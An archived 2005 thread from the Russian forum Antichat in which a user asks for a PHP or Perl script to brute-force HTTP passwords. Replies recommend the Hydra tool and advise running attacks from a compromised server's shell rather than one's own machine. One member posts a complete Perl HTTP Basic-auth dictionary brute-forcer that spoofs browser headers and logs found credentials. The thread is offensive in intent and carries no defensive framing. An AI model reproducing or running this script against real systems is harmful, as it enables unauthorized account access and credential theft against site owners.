Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   Подбор паролей к Xxx (https://forum.antichat.xyz/showthread.php?t=6427)

dim_ok 07.05.2005 16:32

Подбор паролей к Xxx
 
Кто нибудь знает где можно достать скрипт для подбора паролей по http на PHP или Perl'e. Заранее благодарен!

Kr@b! 08.05.2005 20:13

Задай вопрос на securitylab.ru, там подскажут, только все указывай конкретно и выкладывай как можно больше информации об объекте!!!

k00p3r 01.06.2005 19:22

а чем те Hydra не нравится???лучший брутфорс.ищи через поисковик....

dim_ok 18.06.2005 23:49

Цитата:

Сообщение от k00p3r
а чем те Hydra не нравится???лучший брутфорс.ищи через поисковик....

Со своего компа брутить - это не дело.

m0nzt3r 19.06.2005 00:00

необязательно со своего компа можно и с шелла)
вот скриптик на перле
Код:

#!/usr/bin/perl

use MIME::Base64;
use IO::Socket;

  if(@ARGV < 5)
  {
      print q(
      .:: Skides DiGiTaL Security ::.
      ------------------------------------
      HTTP-Basic brutforce by rav3n!
      Usage: SHTTP.pl [HOST] [PORT] [DIR] [USER] [DIC]
      );

      exit 0;
  }

  $server = $ARGV[0];
  $port  = $ARGV[1];
  $dir    = $ARGV[2];
  $user  = $ARGV[3];
  $words  = $ARGV[4];

  $foundpass  = "success.log";
  $nowcheck  = "now.log";

    open(FILE, "$words") || die print "$!\n";

    while($pass = <FILE>)
    {
      $i++;
      chomp($pass);
     
      open(NOW,">$nowcheck") || die print "$!\n";
      print NOW "now $user:$pass -> check $i item\n";
      close NOW;

      $access = encode_base64("$user\:$pass");
      chomp($access);

      $socket=IO::Socket::INET->new(
                                      PeerAddr => $server,
                                      PeerPort => $port,
                                      Photo => tcp
                                    )                                   
                                   
      || die print "Unable to connect to $server:$port\n";

      print $socket "GET $dir HTTP/1.1\n";
      print $socket "Host: $server\n";
      print $socket "Accept: */*\n";
      print $socket "Referer: http://microsoft.com/\n";
      print $socket "User-Agent: Internet Explorer 6.0\n";
      print $socket "Pragma: no-cache\n";
      print $socket "Cache-Control: no-cache\n";
      print $socket "Authorization: Basic $access\n";
      print $socket "Connection: close\n\n";

      while(<$socket>)
      {
          if(/(HTTP\/1\.[0-1]\s200\sOK)/)
          {
            open(FILE,">$foundpass") || die print "$!\n";
            print FILE "SUCCESS!!! valid $user:$pass";
            close FILE;
            unlink($nowcheck);
            exit 0;
          }

      }
     
    close $socket;
  }


dim_ok 19.06.2005 00:03

ща попробуем перловый.

KEZ 19.06.2005 12:30

перенесено в PHP,Perl,MySQL
так как к халяве никакого отношения не имеет и название XXX тут не причем

t4k 07.07.2005 02:29

Блин, а я то подумал что порнушку нахаляву дадут посмотреть... :d
Ну да ладно, скажу только что брутфорс на перле или пхп это не дело, ты быстрее с того-же самого диалапа гидрой пароль подберёшь или через шелл на серваке, тем более что на многих хостах стоит ограничение на время выполнения скриптов.

dim_ok 07.07.2005 23:46

Цитата:

Ну да ладно, скажу только что брутфорс на перле или пхп это не дело, ты быстрее с того-же самого диалапа гидрой пароль подберёшь
Так я и не куда не тороплюсь :)


Время: 06:48